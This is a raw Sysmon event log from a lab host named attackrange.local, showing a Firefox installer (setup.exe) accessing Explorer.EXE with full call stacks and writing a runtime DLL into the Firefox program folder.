Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-conio-l1-1-0.dll2021-01-18 13:59:52.146 10341000x800000000000000014268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 